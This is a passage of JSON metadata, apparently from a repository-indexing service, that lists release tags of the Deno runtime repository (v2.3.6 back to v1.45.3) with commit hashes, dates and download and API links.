a4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1